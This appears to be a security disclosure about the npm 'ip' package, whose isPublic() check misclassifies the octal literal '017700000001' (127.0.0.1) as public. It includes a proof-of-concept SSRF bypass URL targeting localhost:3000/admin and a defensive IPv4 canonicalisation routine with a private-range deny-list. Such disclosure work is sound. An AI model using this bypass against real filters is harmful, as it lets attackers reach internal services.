Summary
This report describes an additional critical SSRF bypass in the ip.isPublic() function that is not covered by the existing Issue #150 or Issue #160.
Vulnerability Details
The input "017700000001" (a 32-bit octal representation of an IPv4 address) is incorrectly classified as a public IP address, allowing SSRF bypass attacks:

```javascript
const ip = require('ip');

console.log(ip.isPublic("017700000001"));  // true ❌ (should be false)
console.log(ip.isPrivate("017700000001")); // false ❌ (should be true)

// Correct behavior for the dotted-decimal form of the same address:
console.log(ip.isPublic("127.0.0.1"));     // false ✅
```
Impact
Severity: Critical SSRF bypass
Attack vector: http://017700000001:port/path URLs bypass IP validation
Network behavior: "017700000001" (octal) = 2130706433 (decimal) = 127.0.0.1 (localhost)
Format explanation: a 32-bit octal representation in which the entire IPv4 address is encoded as a single octal number.
Proof of Concept
```javascript
const ip = require('ip');

// Typical vulnerable application: relies on ip.isPublic() to block
// requests to loopback/private hosts.
function makeRequest(userUrl) {
  const hostname = new URL(userUrl).hostname;
  if (ip.isPublic(hostname)) {
    return fetch(userUrl); // BYPASSED!
  }
  throw new Error("Private IP blocked");
}

// Attack succeeds:
makeRequest("http://017700000001:3000/admin"); // Accesses localhost:3000
```
Technical Analysis
The vulnerability stems from insufficient validation of alternative IP address representations:
```javascript
// Octal to decimal conversion:
parseInt("017700000001", 8); // 2130706433

// Decimal to IP conversion:
// 2130706433 = (127 << 24) + (0 << 16) + (0 << 8) + 1 = 127.0.0.1
```
Relationship to Existing Issues
This octal format bypass complements the other techniques reported in:
Issue #150 (127.1, 127.0.1, fe80::0001, etc.)
Issue #160 (null route "0")
It was not included in either of those lists, so it represents an additional attack vector.
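As a defensive counterpart to the analysis above, the following added example (not code from the ip package or from this report) canonicalises inet_aton-style IPv4 literals to dotted decimal before any public/private decision, so the 32-bit octal form, the "127.1" shorthand from Issue #150 and the "0" form from Issue #160 all collapse to their real addresses first. It goes beyond the single case in the text by handling hex, decimal and fewer-than-four-part forms as well; the function names are chosen for this example.

```javascript
// Added example (not the ip package's code): canonicalise inet_aton-style
// IPv4 literals before any allow/deny decision. Function names are chosen
// for this example. Handles the page's "017700000001", "127.1" and "0".
const PART = /^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$/;

function parsePart(s) {
  if (!PART.test(s)) return null;
  if (/^0[xX]/.test(s)) return parseInt(s.slice(2), 16); // hex
  if (s.length > 1 && s[0] === '0') return parseInt(s, 8); // octal
  return parseInt(s, 10);                                  // decimal
}

// Mirrors inet_aton(3): "a.b.c.d", "a.b.c" (c = 16 bits), "a.b" (b = 24 bits),
// "a" (a = 32 bits). Returns canonical dotted decimal, or null if not IPv4.
function parseIpv4Literal(host) {
  const parts = host.split('.');
  if (parts.length > 4) return null;
  const nums = parts.map(parsePart);
  if (nums.some(n => n === null)) return null;
  const last = nums[nums.length - 1];
  if (last >= 2 ** (8 * (5 - nums.length))) return null;
  if (nums.slice(0, -1).some(n => n > 255)) return null;
  let value = 0;
  for (let i = 0; i < nums.length - 1; i++) value = value * 256 + nums[i];
  value = value * 256 ** (5 - nums.length) + last;
  return [24, 16, 8, 0].map(sh => (value >>> sh) & 255).join('.');
}

// Deny-list of non-public IPv4 ranges (loopback, RFC 1918, link-local, "this").
const BLOCKED = [['0.0.0.0', 8], ['10.0.0.0', 8], ['127.0.0.0', 8],
                 ['169.254.0.0', 16], ['172.16.0.0', 12], ['192.168.0.0', 16]];

function toUint32(dotted) {
  return dotted.split('.').reduce((acc, p) => acc * 256 + Number(p), 0);
}

function inCidr(addr, base, bits) {
  const mask = (0xffffffff << (32 - bits)) >>> 0;
  return ((toUint32(addr) & mask) >>> 0) === ((toUint32(base) & mask) >>> 0);
}

// true = public literal, false = blocked literal, null = not an IPv4 literal
// (a hostname must be resolved and every resolved address re-checked).
function isPublicIpv4Literal(host) {
  const canonical = parseIpv4Literal(host);
  if (canonical === null) return null;
  return !BLOCKED.some(([base, bits]) => inCidr(canonical, base, bits));
}
```

A null result is not a pass: the caller still has to resolve the name and run every resolved address through the same range check.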
Affected Version
Package: [email protected] (current latest)
Downloads: 5+ million weekly
Impact scope: All applications using ip.isPublic() for SSRF protection
CVE Assignment
CVE-2025-59436 has been assigned for this vulnerability.
CVE Database: https://nvd.nist.gov/vuln/detail/CVE-2025-59436
Severity: Critical (despite initial LOW scoring by MITRE - under review)
Request: Please consider addressing this octal format bypass alongside the other reported bypass techniques for comprehensive security coverage.